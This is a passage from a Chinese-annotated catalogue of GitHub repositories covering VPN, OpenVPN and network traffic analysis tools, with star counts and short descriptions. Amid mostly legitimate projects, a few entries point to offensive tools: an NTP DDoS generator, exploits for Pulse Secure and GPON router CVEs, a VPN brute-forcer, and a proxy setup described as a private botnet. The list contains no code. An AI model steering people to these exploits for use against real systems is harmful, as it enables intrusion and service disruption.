[**3152**ๆ˜Ÿ][3m] [Shell] [hwdsl2/docker-ipsec-vpn-server](https://github.com/hwdsl2/docker-ipsec-vpn-server) Docker image to run an IPsec VPN server, with IPsec/L2TP and Cisco IPsec - [**2558**ๆ˜Ÿ][13d] [Shell] [teddysun/across](https://github.com/teddysun/across) This is a shell script for configure and start WireGuard VPN server - [**2430**ๆ˜Ÿ][15d] [Py] [pritunl/pritunl](https://github.com/pritunl/pritunl) Enterprise VPN server - [**2131**ๆ˜Ÿ][4d] [C] [wireguard/wireguard](https://github.com/wireguard/wireguard) fast, modern, secure kernel VPN tunnel - [**1740**ๆ˜Ÿ][6m] [Shell] [quericy/one-key-ikev2-vpn](https://github.com/quericy/one-key-ikev2-vpn) A bash script base on Centos or Ubuntu help you to create IKEV2/L2TP vpn. - [**1600**ๆ˜Ÿ][1m] [C] [ntop/n2n](https://github.com/ntop/n2n) Peer-to-peer VPN - [**1526**ๆ˜Ÿ][2m] [Shell] [haugene/docker-transmission-openvpn](https://github.com/haugene/docker-transmission-openvpn) Docker container running Transmission torrent client with WebUI over an OpenVPN tunnel - [**1489**ๆ˜Ÿ][8m] [C++] [wangyu-/tinyfecvpn](https://github.com/wangyu-/tinyfecvpn) A VPN Designed for Lossy Links, with Build-in Forward Error Correction(FEC) Support. Improves your Network Quality on a High-latency Lossy Link. - [**1185**ๆ˜Ÿ][4m] [C] [ambrop72/badvpn](https://github.com/ambrop72/badvpn) NCD scripting language, tun2socks proxifier, P2P VPN - [**1044**ๆ˜Ÿ][2m] [Py] [ezaquarii/vpn-at-home](https://github.com/ezaquarii/vpn-at-home) 1-click, self-hosted deployment of OpenVPN with DNS ad blocking sinkhole - [**1023**ๆ˜Ÿ][12m] [Go] [twitchyliquid64/subnet](https://github.com/twitchyliquid64/subnet) Simple, auditable & elegant VPN, built with TLS mutual authentication and TUN. - [**1000**ๆ˜Ÿ][8m] [Go] [adtac/autovpn](https://github.com/adtac/autovpn) THIS PROJECT IS UNMAINTAINED. - [**994**ๆ˜Ÿ][4m] [C] [gsliepen/tinc](https://github.com/gsliepen/tinc) a VPN daemon - [**911**ๆ˜Ÿ][9m] [Shell] [ivanilves/xiringuito](https://github.com/ivanilves/xiringuito) SSH-based "VPN for poors" - [**910**ๆ˜Ÿ][4d] [Go] [mehrdadrad/radvpn](https://github.com/mehrdadrad/radvpn) Decentralized VPN - [**884**ๆ˜Ÿ][2y] [Py] [nsacyber/gosecure](https://github.com/nsacyber/goSecure) An easy to use and portable Virtual Private Network (VPN) system built with Linux and a Raspberry Pi. #nsacyber - [**721**ๆ˜Ÿ][7m] [C] [meyerd/n2n](https://github.com/meyerd/n2n) A development branch of the n2n p2p vpn software - [**693**ๆ˜Ÿ][12d] [Kotlin] [mygod/vpnhotspot](https://github.com/mygod/vpnhotspot) Share your VPN connection over hotspot or repeater! (root required) - [**688**ๆ˜Ÿ][1m] [OCaml] [moby/vpnkit](https://github.com/moby/vpnkit) A toolkit for embedding VPN capabilities in your application - [**641**ๆ˜Ÿ][2y] [Shell] [kitten/setup-simple-ipsec-l2tp-vpn](https://github.com/kitten/setup-simple-ipsec-l2tp-vpn) Setup a simple IPSec/L2TP VPN Server for Ubuntu and Debian - [**635**ๆ˜Ÿ][26d] [webdigi/aws-vpn-server-setup](https://github.com/webdigi/aws-vpn-server-setup) Setup your own private, secure, free* VPN on the Amazon AWS Cloud in 10 minutes. CloudFormation - [**598**ๆ˜Ÿ][27d] [C] [openvpn/openvpn-gui](https://github.com/openvpn/openvpn-gui) OpenVPN GUI is a graphical frontend for OpenVPN running on Windows XP / Vista / 7 / 8. It creates an icon in the notification area from which you can control OpenVPN to start/stop your VPN tunnels, view the log and do other useful things. - [**581**ๆ˜Ÿ][5d] [Go] [mysteriumnetwork/node](https://github.com/mysteriumnetwork/node) Mysterium Node - VPN server and client for decentralized Mysterium Network - [**482**ๆ˜Ÿ][1y] [Swift] [icepa/icepa](https://github.com/icepa/icepa) iOS system-wide VPN based Tor client - [**460**ๆ˜Ÿ][3y] [Py] [vpnguy-zz/ntpdos](https://github.com/vpnguy-zz/ntpdos) Create a DDOS attack using NTP servers - [**452**ๆ˜Ÿ][2m] [Shell] [l-n-s/wireguard-install](https://github.com/l-n-s/wireguard-install) WireGuard VPN server installer - [**429**ๆ˜Ÿ][3m] [Py] [jotygill/openpyn-nordvpn](https://github.com/jotygill/openpyn-nordvpn) Easily connect to and switch between, OpenVPN servers hosted by NordVPN on Linux (+patch leakes) - [**416**ๆ˜Ÿ][3m] [Rust] [exodusvpn/exodus](https://github.com/ExodusVPN/exodus) network proxy and tunnel (VPN) - [**350**ๆ˜Ÿ][6m] [Shell] [hackplayers/4nonimizer](https://github.com/hackplayers/4nonimizer) A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN) - [**341**ๆ˜Ÿ][2y] [Py] [sarfata/voodooprivacy](https://github.com/sarfata/voodooprivacy) Roll your own VPN server on Amazon EC2 and battle-ready firewall for OS X - [**327**ๆ˜Ÿ][2y] [Swift] [yichengchen/rabbitvpndemo](https://github.com/yichengchen/rabbitvpndemo) a demo project for testing iOS network extension with NEkit - [**307**ๆ˜Ÿ][6m] [Batchfile] [lmc999/auto-add-routes](https://github.com/lmc999/auto-add-routes) China Route for VPN - [**288**ๆ˜Ÿ][3m] [Py] [covertcodes/multitun](https://github.com/covertcodes/multitun) Tunnel arbitrary traffic through an innocuous WebSocket. Clients can 'see' each other, resulting in a stealth WebSocket VPN. - [**263**ๆ˜Ÿ][2m] [C#] [airvpn/eddie](https://github.com/airvpn/eddie) OpenVPN UI - [**255**ๆ˜Ÿ][4m] [Shell] [projectzeroindia/cve-2019-11510](https://github.com/projectzeroindia/cve-2019-11510) Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) - [**251**ๆ˜Ÿ][3m] [Py] [corrad1nho/qomui](https://github.com/corrad1nho/qomui) Qomui (Qt OpenVPN Management UI) - [**247**ๆ˜Ÿ][2y] [Py] [spaze/oprah-proxy](https://github.com/spaze/oprah-proxy) Generate credentials for Opera's "browser VPN" - [**195**ๆ˜Ÿ][2y] [Py] [f3d0x0/gpon](https://github.com/f3d0x0/gpon) Exploit for Remote Code Execution on GPON home routers (CVE-2018-10562) written in Python. Initially disclosed by VPNMentor ( - [**190**ๆ˜Ÿ][4m] [Go] [cloudfoundry-incubator/cfdev](https://github.com/cloudfoundry-incubator/cfdev) A fast and easy local Cloud Foundry experience on native hypervisors, powered by LinuxKit with VPNKit - [**185**ๆ˜Ÿ][1y] [Perl] [microsoft/pqcrypto-vpn](https://github.com/microsoft/pqcrypto-vpn) Post-quantum Cryptography VPN - [**175**ๆ˜Ÿ][2m] [Go] [gavinguan24/ahri](https://github.com/gavinguan24/ahri) Ahri is an intranet sharing tool. Like VPN - [**169**ๆ˜Ÿ][7m] [JS] [sentinel-official/sentinel](https://github.com/sentinel-official/sentinel) Sentinel is an interoperable secure network layer offering the Sentinel Service Chain exclusively for distributed & decentralized native services like - dVPN, Sentrix (dChat and dVoIP) and more. - [**154**ๆ˜Ÿ][3y] [Makefile] [0x36/vpnpivot](https://github.com/0x36/vpnpivot) Explore the network using VPNPivot tool - [**147**ๆ˜Ÿ][4y] [C] [valdikss/openvpn-fix-dns-leak-plugin](https://github.com/valdikss/openvpn-fix-dns-leak-plugin) OpenVPN plugin to fix Windows DNS Leaks - [**143**ๆ˜Ÿ][10m] [Shell] [essandess/macos-openvpn-server](https://github.com/essandess/macos-openvpn-server) macOS OpenVPN Server and Client Configuration (OpenVPN, Tunnelblick, PF) - [**142**ๆ˜Ÿ][4y] [C] [valdikss/p0f-mtu](https://github.com/valdikss/p0f-mtu) p0f with patches to save MTU value and export it via API (for VPN detection) - [**140**ๆ˜Ÿ][4m] [Go] [skx/simple-vpn](https://github.com/skx/simple-vpn) A simple VPN allowing mesh-like communication between nodes, over websockets - [**131**ๆ˜Ÿ][6d] [Shell] [binhex/arch-rtorrentvpn](https://github.com/binhex/arch-rtorrentvpn) Docker build script for Arch Linux base with ruTorrent, rTorrent, autodl-irssi, Privoxy and OpenVPN - [**123**ๆ˜Ÿ][4y] [Shell] [91yun/vpn](https://github.com/91yun/vpn) vpnไธ€้”ฎๅฎ‰่ฃ…ๅŒ… - [**115**ๆ˜Ÿ][2y] [Py] [dragon2fly/vpngate-with-proxy](https://github.com/dragon2fly/vpngate-with-proxy) vpn gate client for linux, be able to connect to open vpn server through proxy - [**115**ๆ˜Ÿ][1y] [Shell] [wknapik/vpnfailsafe](https://github.com/wknapik/vpnfailsafe) IP leak prevention for OpenVPN - [**113**ๆ˜Ÿ][2y] [bobnisco/adblocking-vpn](https://github.com/bobnisco/adblocking-vpn) - [**111**ๆ˜Ÿ][2y] [Shell] [adrelanos/vpn-firewall](https://github.com/adrelanos/vpn-firewall) Leak Protection (Fail Safe Mechanism) for (Open)VPN - [**110**ๆ˜Ÿ][2y] [JS] [voidsec/webrtc-leak](https://github.com/voidsec/webrtc-leak) Check if your VPN leaks your IP address via the WebRTC technology - [**105**ๆ˜Ÿ][4y] [Go] [netxfly/transparent-proxy-scanner](https://github.com/netxfly/transparent-proxy-scanner) ๅŸบไบŽvpnๅ’Œ้€ๆ˜Žไปฃ็†็š„webๆผๆดžๆ‰ซๆๅ™จ็š„ๅฎž็Žฐๆ€่ทฏๅŠdemo - [**102**ๆ˜Ÿ][11m] [C] [ryd/chaosvpn](https://github.com/ryd/chaosvpn) Config generator for chaos vpn - [**93**ๆ˜Ÿ][18d] [Py] [chadsr/nordvpn-networkmanager](https://github.com/chadsr/nordvpn-networkmanager) A CLI tool for automating the importing, securing and usage of NordVPN (and in the future, more) OpenVPN servers through NetworkManager. - [**91**ๆ˜Ÿ][2y] [Py] [pry0cc/proxydock](https://github.com/pry0cc/proxydock) ProxyDock is a Dockerfile and Bash script that converts your OpenVPN files into local proxies. - [**90**ๆ˜Ÿ][2y] [C++] [azirevpn/azclient](https://github.com/azirevpn/azclient) Customizable VPN client, meant to be simple and sleek. - [**90**ๆ˜Ÿ][4y] [Shell] [primaryobjects/vpndemon](https://github.com/primaryobjects/vpndemon) Monitor a VPN connection on Linux and kill a process upon disconnect - [**83**ๆ˜Ÿ][4d] [Shell] [esemeniuc/ezpptp](https://github.com/esemeniuc/ezpptp) Easy PPTP VPN setup script for Debian based VPS - [**82**ๆ˜Ÿ][8m] [Go] [cogolabs/transcend](https://github.com/cogolabs/transcend) BeyondCorp-inspired Access Proxy. Secure internal services outside your VPN/perimeter network during a zero-trust transition. - [**77**ๆ˜Ÿ][2m] [Py] [ab77/black.box](https://github.com/ab77/black.box) Plug-and-Play VPN router and unblocker - [**76**ๆ˜Ÿ][1y] [Shell] [kolargol/openvpn](https://github.com/kolargol/openvpn) Shell ่„šๆœฌ๏ผŒ5ๅˆ†้’Ÿๅปบ็ซ‹ไธชไบบ VPN - [**72**ๆ˜Ÿ][4d] [C++] [orchidtechnologies/orchid](https://github.com/OrchidTechnologies/orchid) Orchid: VPN, Personal Firewall - [**72**ๆ˜Ÿ][4d] [C++] [orchidtechnologies/orchid](https://github.com/orchidtechnologies/orchid) Orchid: VPN, Personal Firewall - [**70**ๆ˜Ÿ][1m] [Go] [vpn-kill-switch/killswitch](https://github.com/vpn-kill-switch/killswitch) VPN kill switch for macOS - [**67**ๆ˜Ÿ][6m] [Shell] [tasket/qubes-vpn-support](https://github.com/tasket/qubes-vpn-support) VPN configuration in Qubes OS - [**64**ๆ˜Ÿ][3y] [Perl] [0x90/vpn-arsenal](https://github.com/0x90/vpn-arsenal) VPN pentest tools and scripts - [**58**ๆ˜Ÿ][7m] [Go] [dsnet/udptunnel](https://github.com/dsnet/udptunnel) Daemon for creating a simple VPN over UDP. - [**55**ๆ˜Ÿ][3m] [Shell] [bishopfox/pwn-pulse](https://github.com/bishopfox/pwn-pulse) Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510) - [**53**ๆ˜Ÿ][8m] [Shell] [laserbat/vpnify](https://github.com/laserbat/vpnify) vpnify - transparently route traffic of a process through VPN - [**50**ๆ˜Ÿ][11m] [C] [acoinfo/kidvpn](https://github.com/acoinfo/kidvpn) The world's smallest VPN server and client. - [**47**ๆ˜Ÿ][3y] [Go] [inszva/tap0901](https://github.com/inszva/tap0901) Go่ฏญ่จ€่™šๆ‹Ÿ็ฝ‘ๅกๅบ“๏ผŒๅฏ็”จไบŽๅˆถไฝœๅฏนๆˆ˜ๅนณๅฐใ€ๅŠ ้€Ÿๅ™จใ€้˜ฒ็ซๅข™ใ€VPN็ญ‰ - [**42**ๆ˜Ÿ][3y] [C] [lxdcn/simple-vpn-demo](https://github.com/lxdcn/simple-vpn-demo) A Simple Point-to-Point tunnelling implementation in C - [**40**ๆ˜Ÿ][2y] [Shell] [xaqron/stunnel](https://github.com/xaqron/stunnel) Wrapping openvpn with stunnel - [**36**ๆ˜Ÿ][4m] [Shell] [hromie/obfs4proxy-openvpn](https://github.com/hromie/obfs4proxy-openvpn) Obfuscating OpenVPN traffic using obfs4proxy - [**34**ๆ˜Ÿ][3y] [Shell] [dlshad/openvpn-shapeshifter](https://github.com/dlshad/openvpn-shapeshifter) This script will automatically guide you to install and configure your OpenVPN server with Shapeshifter Dispatcher (obfuscation) which will allow you to bypass the DPI blockage on OpenVPN. This setup will offer the users the freedom to choose between regular OpenVPN connection or obfuscated one, they actually can use both! OpenVPN is the VPN proโ€ฆ - [**33**ๆ˜Ÿ][11m] [Py] [qwj/python-esp](https://github.com/qwj/python-esp) IPSec IKE(v1,v2) PSK VPN implemented in pure Python. (For Research Purposes Only) - [**32**ๆ˜Ÿ][2m] [Go] [shikanon/socks5proxy](https://github.com/shikanon/socks5proxy) ไธ€ไธช็ฎ€ๅ•็š„socks5ไปฃ็†่ฝฌๅ‘ๆœๅŠก(VPN) - [**31**ๆ˜Ÿ][2y] [C] [alienrobotarmy/ctunnel](https://github.com/alienrobotarmy/ctunnel) ctunnel is a proxy and VPN software for tunneling TCP and UDP connections securely - [**29**ๆ˜Ÿ][4y] [Makefile] [radicallyopensecurity/netaidkit](https://github.com/radicallyopensecurity/netaidkit) Standalone VPN/Tor WiFi router for journalists and activists - ้‡ๅคๅŒบๆฎต: [ๅŒฟๅ็ฝ‘็ปœ->ๅทฅๅ…ท->Tor](#e99ba5f3de02f68412b13ca718a0afb6) | - [**27**ๆ˜Ÿ][2m] [HTML] [tkvpn/tkvpn.github.io](https://github.com/tkvpn/tkvpn.github.io) ่ฟ™้‡Œๆไพ›ๅ…จ็ƒๅคšไธช็ฝ‘็ปœๅŠ ้€Ÿ่Š‚็‚น๏ผŒ้€Ÿๅบฆๆžๅฟซ๏ผŒๆไพ›ๅ…่ดน่ฏ•็”จใ€‚ - [**26**ๆ˜Ÿ][9m] [Shell] [shverni/raspberry-pi-vpn-gateway](https://github.com/shverni/raspberry-pi-vpn-gateway) Raspberry Pi VPN gateway installer for Private Internet Access - [**25**ๆ˜Ÿ][1y] [Tcl] [fruho/fruhoapp](https://github.com/fruho/fruhoapp) Fruho VPN Manager - Universal VPN Client | - [**25**ๆ˜Ÿ][9m] [Py] [letheanmovement/lethean-vpn](https://github.com/letheanmovement/lethean-vpn) Lethean Virtual Private Network (VPN) - [**23**ๆ˜Ÿ][21d] [PHP] [ip2location/ip2proxy-php](https://github.com/ip2location/ip2proxy-php) PHP module for IP2Proxy database lookup. It allows user to query an IP address if it was being used as open proxy, web proxy, VPN anonymizer and TOR exits. - [**23**ๆ˜Ÿ][8m] [PHP] [mrahmadt/smartgw](https://github.com/mrahmadt/smartgw) Domain based VPN Gateway/Proxy for all devices - [**22**ๆ˜Ÿ][12d] [Py] [wisepythagoras/website-fingerprinting](https://github.com/wisepythagoras/website-fingerprinting) Deanonymizing Tor or VPN users with website fingerprinting and machine learning. - [**22**ๆ˜Ÿ][3m] [Dockerfile] [kizzx2/docker-openvpn-client-socks](https://github.com/kizzx2/docker-openvpn-client-socks) Expose an OpenVPN tunnel as a SOCKS proxy - [**22**ๆ˜Ÿ][12d] [Py] [wisepythagoras/website-fingerprinting](https://github.com/wisepythagoras/website-fingerprinting) Deanonymizing Tor or VPN users with website fingerprinting and machine learning. - [**21**ๆ˜Ÿ][3y] [Py] [toolsprods/sniffvpn](https://github.com/toolsprods/sniffvpn) Traffic monitor for your VPN - [**19**ๆ˜Ÿ][4y] [HTML] [cryptostorm-dev/cleanvpn.xyz](https://github.com/cryptostorm-dev/cleanvpn.xyz) A place to research & publicly certify malware-free, fully operational VPN services - [**17**ๆ˜Ÿ][3y] [Shell] [jxzy199306/ipv6_dhclient_online_net](https://github.com/jxzy199306/ipv6_dhclient_online_net) seedboxไธ€้”ฎ่„šๆœฌ Deluge+Flexget,rutorrent, rtorrent + ruTorrent,Transmission+Flexget,FTP,VPN,VNC,SSH Proxy,Rapidleec - [**16**ๆ˜Ÿ][3m] [Py] [andresriancho/vpc-vpn-pivot](https://github.com/andresriancho/vpc-vpn-pivot) Pivot into private VPC networks using a VPN connection - [**14**ๆ˜Ÿ][1y] [C#] [t0nic/killswitch-windows](https://github.com/t0nic/killswitch-windows) VPN kill switch for windows. - [**11**ๆ˜Ÿ][6m] [Go] [threatstack/vpnnotify](https://github.com/threatstack/vpnnotify) It tells you when you VPN - [**10**ๆ˜Ÿ][3y] [Shell] [perunworks/zenected](https://github.com/perunworks/zenected) Zenected Threat Defense VPN - [**9**ๆ˜Ÿ][2y] [C] [guidovranken/softethervpn-fuzz-audit](https://github.com/guidovranken/softethervpn-fuzz-audit) - [**9**ๆ˜Ÿ][jasper-1024/shadowsocksr-csharp](https://github.com/jasper-1024/shadowsocksr-csharp) ShadowsocksR for Windows - [**8**ๆ˜Ÿ][2y] [C] [penmast/chameleon](https://github.com/penmast/chameleon) A Windows application-specific VPN and network monitoring tool - [**7**ๆ˜Ÿ][10d] [Py] [dlenski/what-vpn](https://github.com/dlenski/what-vpn) Identify servers running various SSL VPNs based on protocol-specific behaviors - [**7**ๆ˜Ÿ][3y] [jas502n/ngrok.snvpn.org](https://github.com/jas502n/ngrok.snvpn.org) ่‡ชๅทฑๆญๅปบ็š„ไธ€ไธชngrokๆœๅŠกๅ™จ๏ผŒๅฏไปฅๅ…จ็ƒ่ฎฟ้—ฎ - [**5**ๆ˜Ÿ][5y] [C] [inode-/vpnc-brute](https://github.com/inode-/vpnc-brute) - [**5**ๆ˜Ÿ][3y] [JS] [mitchellurgero/pivpn-gui](https://github.com/mitchellurgero/pivpn-gui) THIS PROJECT IS DEAD. PLEASE USE OPENRSD WHICH INCLUDES THIS GUI - - [**4**ๆ˜Ÿ][1m] [Shell] [gardener/vpn](https://github.com/gardener/vpn) Network connector between the control plane (deployed in a Seed cluster) and a Shoot cluster. - [**4**ๆ˜Ÿ][3y] [Shell] [zecopro/fix-vpn-kali-linux](https://github.com/zecopro/fix-vpn-kali-linux) this script for fix problem vpn on kali linux "Rooling" only :) - [**4**ๆ˜Ÿ][3y] [C] [ddlsmurf/sov](https://github.com/ddlsmurf/sov) Starcraft over VPN - [**2**ๆ˜Ÿ][1y] [Py] [paloaltonetworks/microsoft_azure_virtual_wan](https://github.com/paloaltonetworks/microsoft_azure_virtual_wan) Implements the automation and integration framework to work with Azure Virtual WAN's and PANW to create VPN connections. - [**0**ๆ˜Ÿ][2y] [alt3kx/cve-2009-4118](https://github.com/alt3kx/cve-2009-4118) Cisco VPN Client - Integer Overflow Denial of Service *** ## <a id="7cf7e8a30b73997985f20698eaf6b0c9"></a>OpenVPN - [**10693**ๆ˜Ÿ][2m] [Shell] [nyr/openvpn-install](https://github.com/nyr/openvpn-install) OpenVPN road warrior installer for Debian, Ubuntu and CentOS - [**4354**ๆ˜Ÿ][1m] [C] [openvpn/openvpn](https://github.com/openvpn/openvpn) OpenVPN is an open source VPN daemon - [**4050**ๆ˜Ÿ][1m] [Shell] [angristan/openvpn-install](https://github.com/angristan/openvpn-install) Set up your own OpenVPN server on Debian, Ubuntu, Fedora, CentOS or Arch Linux. - [**2708**ๆ˜Ÿ][24d] [Shell] [pivpn/pivpn](https://github.com/pivpn/pivpn) ๆ ‘่Ž“ๆดพ็š„OpenVPNๅฎ‰่ฃ…็จ‹ๅบ - [**1834**ๆ˜Ÿ][2m] [Shell] [ttlequals0/autovpn](https://github.com/ttlequals0/autovpn) Create On Demand Disposable OpenVPN Endpoints on AWS. - [**833**ๆ˜Ÿ][3y] [Shell] [robbintt/popup-openvpn](https://github.com/robbintt/popup-openvpn) Make a self hosted OpenVPN server in 15 minutes - [**598**ๆ˜Ÿ][2m] [PHP] [chocobozzz/openvpn-admin](https://github.com/chocobozzz/openvpn-admin) Install and administrate OpenVPN with a web interface (logs visualisations, users managing...) - [**357**ๆ˜Ÿ][12d] [C++] [openvpn/openvpn3](https://github.com/openvpn/openvpn3) OpenVPN 3 is a C++ class library that implements the functionality of an OpenVPN client, and is protocol-compatible with the OpenVPN 2.x branch. - [**230**ๆ˜Ÿ][1y] [Py] [audibleblink/doxycannon](https://github.com/audibleblink/doxycannon) ไธบไธ€ๅ †OpenVPNๆ–‡ไปถๅˆ†ๅˆซๅˆ›ๅปบDockerๅฎนๅ™จ, ๆฏไธชๅฎนๅ™จๅผ€ๅฏSOCKS5ไปฃ็†ๆœๅŠกๅ™จๅนถ็ป‘ๅฎš่‡ณDockerไธปๆœบ็ซฏๅฃ, ๅ†็ป“ๅˆไฝฟ็”จBurpๆˆ–ProxyChains, ๆž„ๅปบ็งๆœ‰็š„Botnet - [**214**ๆ˜Ÿ][2m] [C++] [ss-abramchuk/openvpnadapter](https://github.com/ss-abramchuk/openvpnadapter) Objective-C wrapper for OpenVPN library. Compatible with iOS and macOS. - [**142**ๆ˜Ÿ][3m] [Gherkin] [iphoting/ovpnmcgen.rb](https://github.com/iphoting/ovpnmcgen.rb) An OpenVPN iOS Configuration Profile (.mobileconfig) Utilityโ€”Configures OpenVPN for use with VPN-on-Demand that are not exposed through Apple Configurator 2. - [**35**ๆ˜Ÿ][20d] [Go] [mysteriumnetwork/go-openvpn](https://github.com/mysteriumnetwork/go-openvpn) - [**28**ๆ˜Ÿ][5y] [Py] [phaeilo/vol-openvpn](https://github.com/phaeilo/vol-openvpn) A Volatility plugin to extract credentials from the memory of a OpenVPN client. - [**27**ๆ˜Ÿ][2y] [C] [guidovranken/openvpn](https://github.com/guidovranken/openvpn) OpenVPN is an open source VPN daemon - [**23**ๆ˜Ÿ][2m] [Shell] [binhex/arch-int-openvpn](https://github.com/binhex/arch-int-openvpn) Docker build script for Arch Linux base with OpenVPN and Privoxy - [**21**ๆ˜Ÿ][5y] [C] [valdikss/openvpn-radiusplugin](https://github.com/valdikss/openvpn-radiusplugin) Radiusplugin with various patches and fixes - [**17**ๆ˜Ÿ][4y] [rootkitsmm/openvpn-pool-overflow](https://github.com/rootkitsmm/openvpn-pool-overflow) Pool Overflow in OpenVpn NDIS TAP Driver - [**15**ๆ˜Ÿ][3y] [Go] [tazjin/watchblob](https://github.com/tazjin/watchblob) Connect to 2-factor WatchGuard VPNs on Linux with OpenVPN - [**8**ๆ˜Ÿ][4m] [Py] [egeneralov/rkn-vpn-configurator](https://github.com/egeneralov/rkn-vpn-configurator) Configure OpenVPN with bypass rkn.gov.ru limits. - [**6**ๆ˜Ÿ][1y] [C++] [mysteriumnetwork/openvpn3](https://github.com/mysteriumnetwork/openvpn3) OpenVPN 3 is a C++ class library that implements the functionality of an OpenVPN client, and is protocol-compatible with the OpenVPN 2.x branch. - [**5**ๆ˜Ÿ][2y] [Shell] [devindevoir/openvpn-installer](https://github.com/devindevoir/openvpn-installer) Secure OpenVPN installer for Debian, Ubuntu, CentOS and Arch Linux. - [**3**ๆ˜Ÿ][6m] [Shell] [2stacks/docker-ovpn](https://github.com/2stacks/docker-ovpn) OpenVPN Server in Docker Container - [**3**ๆ˜Ÿ][2y] [HCL] [abacao/do_tinfoil](https://github.com/abacao/do_tinfoil) Create and provision a OpenVPN server in DigitalOcean with Terraform - [**1**ๆ˜Ÿ][2y] [Shell] [entaopy/dostreisand](https://github.com/entaopy/dostreisand) Streisand sets up a new server running L2TP/IPsec, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, a Tor bridge, and WireGuard. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists. - [**0**ๆ˜Ÿ][1y] [Shell] [frichetten/streisand](https://github.com/frichetten/streisand) Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists. # <a id="3c28b67524f117ed555daed9cc99e35e"></a>ๅˆ†ๆž&&ๅ–่ฏ&&่ฏŠๆ–ญ&&ๆŽขๆŸฅ&&ๆฃ€ๆต‹&&ๅ—…ๆŽข *** ## <a id="7bf0f5839fb2827fdc1b93ae6ac7f53d"></a>ๅทฅๅ…ท ### <a id="b346105580b0240d693020ce8719ebca"></a>ๆœชๅˆ†็ฑป - [**3527**ๆ˜Ÿ][5d] [JS] [aol/moloch](https://github.com/aol/moloch) ๆ•ฐๆฎๅŒ…ๆ•่Žทใ€็ดขๅผ•ๅทฅๅ…ท๏ผŒๆ”ฏๆŒๆ•ฐๆฎๅบ“ - [**3000**ๆ˜Ÿ][4d] [JS] [ntop/ntopng](https://github.com/ntop/ntopng) ๅŸบไบŽWeb็š„ๆต้‡็›‘ๆŽงๅทฅๅ…ท - [**1919**ๆ˜Ÿ][4d] [C] [ntop/ndpi](https://github.com/ntop/ndpi) Open Source Deep Packet Inspection Software Toolkit - [**1893**ๆ˜Ÿ][6d] [C] [merbanan/rtl_433](https://github.com/merbanan/rtl_433) ่งฃ็ ๆฅ่‡ชไปฅ433.9 MHzๅนฟๆ’ญ็š„่ฎพๅค‡๏ผˆไพ‹ๅฆ‚ๆธฉๅบฆไผ ๆ„Ÿๅ™จ๏ผ‰็š„ๆต้‡ - [**1283**ๆ˜Ÿ][1m] [Go] [dreadl0ck/netcap](https://github.com/dreadl0ck/netcap) A framework for secure and scalable network traffic analysis - - [**957**ๆ˜Ÿ][1m] [Py] [fireeye/flare-fakenet-ng](https://github.com/fireeye/flare-fakenet-ng) ไธ‹ไธ€ไปฃๅŠจๆ€็ฝ‘็ปœๅˆ†ๆžๅทฅๅ…ท - [**934**ๆ˜Ÿ][2y] [Py] [tomchop/malcom](https://github.com/tomchop/malcom) Malcom - Malware Communications Analyzer - [**918**ๆ˜Ÿ][2y] [HTML] [snorby/snorby](https://github.com/snorby/snorby) Ruby On Rails Application For Network Security Monitoring - [**726**ๆ˜Ÿ][3m] [Py] [cloudflare/bpftools](https://github.com/cloudflare/bpftools) BPF Tools - packet analyst toolkit - [**711**ๆ˜Ÿ][2y] [Py] [google/ssl_logger](https://github.com/google/ssl_logger) ่งฃๅฏ†ๅนถ่ฎฐๅฝ•่ฟ›็จ‹็š„SSL ๆต็จ‹ - [**519**ๆ˜Ÿ][5d] [C++] [kohler/click](https://github.com/kohler/click) The Click modular router: fast modular packet processing and analysis - [**481**ๆ˜Ÿ][7d] [C#] [chmorgan/sharppcap](https://github.com/chmorgan/sharppcap) ็”จไบŽๆ•่Žทๆ•ฐๆฎๅŒ…็š„่ทจๅนณๅฐ (Windows, Mac, Linux)ๅบ“๏ผŒ.NET็ผ–ๅ†™ - [**448**ๆ˜Ÿ][3d] [C#] [malwareinfosec/ekfiddle](https://github.com/malwareinfosec/ekfiddle) Fiddler Web่ฐƒ่ฏ•ๅ™จ็š„ๆก†ๆžถ๏ผŒ็”จไบŽ็ ”็ฉถๆผๆดžๅˆฉ็”จๅทฅๅ…ทๅŒ…ใ€ๆถๆ„ๅนฟๅ‘Šๅ’Œๆถๆ„ๆต้‡ - ้‡ๅคๅŒบๆฎต: [ๅทฅๅ…ท->fiddler](#31d28e8b2cf6c06411cd5d178dbd3e77) | - [**441**ๆ˜Ÿ][3m] [C++] [pstavirs/ostinato](https://github.com/pstavirs/ostinato) Packet/Traffic Generator and Analyzer - [**409**ๆ˜Ÿ][9m] [Py] [mitrecnd/chopshop](https://github.com/mitrecnd/chopshop) Protocol Analysis/Decoder Framework - [**397**ๆ˜Ÿ][4d] [Py] [idaholab/malcolm](https://github.com/idaholab/malcolm) Malcolm is a powerful, easily deployable network traffic analysis tool suite for full packet capture artifacts (PCAP files) and Zeek logs. - [**316**ๆ˜Ÿ][2y] [Py] [tnich/honssh](https://github.com/tnich/honssh) ่ฎฐๅฝ•ๅฎขๆˆท็ซฏๅ’ŒๆœๅŠกๅ™จไน‹้—ด็š„ๆ‰€ๆœ‰ SSH ้€šไฟก - [**286**ๆ˜Ÿ][2m] [Shell] [tehw0lf/airbash](https://github.com/tehw0lf/airbash) ๅ…จ่‡ชๅŠจ็š„WPAPSKๆกๆ‰‹ๅŒ…ๆ•่Žท่„šๆœฌ, ็”จไบŽๆธ—้€ๆต‹่ฏ• - [**274**ๆ˜Ÿ][19d] [Py] [ghostop14/sparrow-wifi](https://github.com/ghostop14/sparrow-wifi) Next-Gen GUI-based WiFi and Bluetooth Analyzer for Linux - [**210**ๆ˜Ÿ][8m] [JS] [dirtbags/pcapdb](https://github.com/dirtbags/pcapdb) ็ฝ‘็ปœๆ•ฐๆฎๅŒ…ๆ•่Žท็ณป็ปŸ๏ผŒๅˆ†ๅธƒๅผ๏ผŒๅฏนๆœ็ดข่ฟ›่กŒไบ†ไผ˜ๅŒ– - [**194**ๆ˜Ÿ][6m] [Go] [cuishark/cuishark](https://github.com/cuishark/cuishark) A protocol analyzer like a wireshark on CUI. cuishark is using libwireshark to analyze packets. - 